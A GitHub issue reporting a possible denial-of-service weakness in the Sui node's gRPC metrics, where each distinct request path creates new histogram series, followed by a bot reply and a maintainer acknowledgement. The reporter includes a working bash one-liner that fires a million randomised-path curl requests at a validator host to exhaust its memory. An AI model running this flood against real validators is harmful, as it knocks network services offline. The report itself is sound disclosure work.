Possible DOS vector with gRPC metrics

[Lusitaniae]

gRPC interface seems to be creating new metric series for each and every request times the number of histogram buckets defined

https://github.com/MystenLabs/sui/blob/main/crates/sui-node/src/metrics.rs#L88

It would be safer if requests were validated first should have this format path=~/sui.validator.Validator/.*

A motivated attacker could just look up all online validators and start sending millions of requests hitting different paths leading to rapid memory increase

With something as simple as

seq 1000000 | xargs -n1 -P50 -I{} bash -c '
suffix=$(head -c6 /dev/urandom | base64 | tr -dc a-z0-9 | head -c8)
curl -s "http://<validator-host>:8080/mydosattack$suffix" > /dev/null
'

[github-actions]

Thank you for opening this issue, a team member will review it shortly. Until then, please do not interact with any users that claim to be from Sui support and do not click on any links!

[stefan-mysten]

Thanks for the report. The team will have a look!